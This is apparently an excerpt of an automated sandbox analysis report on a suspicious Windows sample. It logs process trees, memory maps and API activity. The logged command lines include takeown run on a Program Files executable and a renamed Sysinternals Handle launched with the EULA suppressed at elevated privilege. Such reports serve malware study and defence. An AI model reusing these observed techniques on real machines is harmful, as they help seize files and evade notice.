| Parent PID | 0xc64 (c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C78
0x
40
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00026fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00043fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0014ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00153fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00171fff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00180000 | 0x001b3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x00186fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x00190fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x002bffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x002c0000 | 0x0037dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000380000 | 0x00380000 | 0x0047ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000480000 | 0x00480000 | 0x00607fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000610000 | 0x00610000 | 0x006dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000610000 | 0x00610000 | 0x006bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006d0000 | 0x006d0000 | 0x006dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006e0000 | 0x006e0000 | 0x00860fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000870000 | 0x00870000 | 0x01c6ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f2b6000 | 0x7f2b6000 | 0x7f2b6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| g13k6qzj64.exe | 0x140000000 | 0x140045fff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x00007ff5ffed0000 | 0x7ff5ffed0000 | 0x7ff5fffcffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff5fffd0000 | 0x7ff5fffd0000 | 0x7ff5ffff2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff5ffff8000 | 0x7ff5ffff8000 | 0x7ff5ffff8fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffb000 | 0x7ff5ffffb000 | 0x7ff5ffffcfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffd000 | 0x7ff5ffffd000 | 0x7ff5ffffefff | Private Memory | rw |
|
|
|
- |
| version.dll | 0x7ff8e3a50000 | 0x7ff8e3a59fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7ff8e6590000 | 0x7ff8e6639fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ff8eadd0000 | 0x7ff8eae19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ff8eae20000 | 0x7ff8eae2efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ff8eae30000 | 0x7ff8eae42fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x7ff8eb180000 | 0x7ff8eb7a7fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ff8eb7b0000 | 0x7ff8eb862fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ff8eb870000 | 0x7ff8eba4cfff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x7ff8eba50000 | 0x7ff8ebb27fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ff8ebdc0000 | 0x7ff8ebf0dfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ff8ec0c0000 | 0x7ff8ec21bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ff8ec240000 | 0x7ff8ec29afff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ff8ec450000 | 0x7ff8ec575fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7ff8ec580000 | 0x7ff8edaa4fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ff8edbc0000 | 0x7ff8edd44fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ff8edd60000 | 0x7ff8edfdbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7ff8edfe0000 | 0x7ff8ee030fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ff8ee0b0000 | 0x7ff8ee14cfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ff8ee150000 | 0x7ff8ee185fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ff8ee190000 | 0x7ff8ee235fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ff8ee2d0000 | 0x7ff8ee37cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
Host Behavior
File (18)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 101 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 58 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 138 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 85 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 59 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 56 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 69 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 74 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 78 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 72 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 49 |
|
1 |
Registry (7)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Sysinternals | value_name = EulaAccepted, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1 |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 |
Module (38)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x7ff8ee2d0000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmn~1\appdata\local\temp\g13k6qzj64.exe, file_name_orig = C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | address_out = 0x7ff8ee2f02a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x7ff8ee2f23f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x7ff8ee2e63c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x7ff8ee2ed920 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x7ff8ee2f5620 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventExW, address_out = 0x7ff8ee2f5580 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x7ff8ee2f55e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7ff8ee2f0e10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7ff8ee2ef110 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x7ff8ee3bcb10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x7ff8ee3c5790 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x7ff8ee3bea10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x7ff8ee2f28c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolWait, address_out = 0x7ff8ee3bc470 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x7ff8ee3c5410 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x7ff8ee4142f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x7ff8ee3f95e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x7ff8ee413130 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7ff8ee2f0fb0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x7ff8ee312720 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x7ff8eb92e7a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7ff8ee3128e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CompareStringEx, address_out = 0x7ff8ee2e6010 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetDateFormatEx, address_out = 0x7ff8ee312a00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7ff8ee2f0310 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTimeFormatEx, address_out = 0x7ff8ee312bc0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7ff8ee2f25d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsValidLocaleName, address_out = 0x7ff8ee312cd0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LCMapStringEx, address_out = 0x7ff8ee2e6000 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentPackageId, address_out = 0x7ff8eb8c45e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTickCount64, address_out = 0x7ff8ee2e65a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsWow64Process, address_out = 0x7ff8ee2ee960 |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #209: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #209 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Portable Devices\publisherfunnydownloaded.exe" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:21, Reason: Child Process |
| Unmonitor | End Time: 00:03:23, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x4e0 |
| Parent PID | 0x380 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
4F4
0x
C5C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00210000 | 0x0021ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000e00000 | 0x00e00000 | 0x04dfffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004e00000 | 0x04e00000 | 0x04e1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004e00000 | 0x04e00000 | 0x04e0ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004e10000 | 0x04e10000 | 0x04e13fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e20000 | 0x04e20000 | 0x04e21fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x04e20000 | 0x04e24fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000004e30000 | 0x04e30000 | 0x04e43fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004e50000 | 0x04e50000 | 0x04e8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e90000 | 0x04e90000 | 0x04ecffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ed0000 | 0x04ed0000 | 0x04ed3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004ee0000 | 0x04ee0000 | 0x04ee0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004ef0000 | 0x04ef0000 | 0x04ef1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04f00000 | 0x04fbdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004fc0000 | 0x04fc0000 | 0x04ffffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x05000000 | 0x05029fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005000000 | 0x05000000 | 0x05000fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005010000 | 0x05010000 | 0x05010fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005030000 | 0x05030000 | 0x0503ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005040000 | 0x05040000 | 0x052dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005040000 | 0x05040000 | 0x0507ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005080000 | 0x05080000 | 0x0519ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000051e0000 | 0x051e0000 | 0x052dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000052e0000 | 0x052e0000 | 0x05467fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005470000 | 0x05470000 | 0x055f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005600000 | 0x05600000 | 0x069fffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x06a00000 | 0x06d36fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x748a0000 | 0x748c7fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ec30000 | 0x7ec30000 | 0x7ed2ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ed30000 | 0x7ed30000 | 0x7ed52fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ed55000 | 0x7ed55000 | 0x7ed55fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ed58000 | 0x7ed58000 | 0x7ed5afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ed5b000 | 0x7ed5b000 | 0x7ed5dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ed5e000 | 0x7ed5e000 | 0x7ed5efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #210: g13k6qzj.exe
175
0
| Information | Value |
|---|---|
| ID | #210 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula "msoeres.dll.mui" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:22, Reason: Child Process |
| Unmonitor | End Time: 00:03:23, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd6c |
| Parent PID | 0x768 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C44
0x
E50
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x002d0000 | 0x002f9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x0030ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x006dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005e0000 | 0x005e0000 | 0x006dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006e0000 | 0x006e0000 | 0x00867fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000870000 | 0x00870000 | 0x009f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a00000 | 0x00a00000 | 0x01dfffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001e00000 | 0x01e00000 | 0x01e9ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74800000 | 0x74891fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
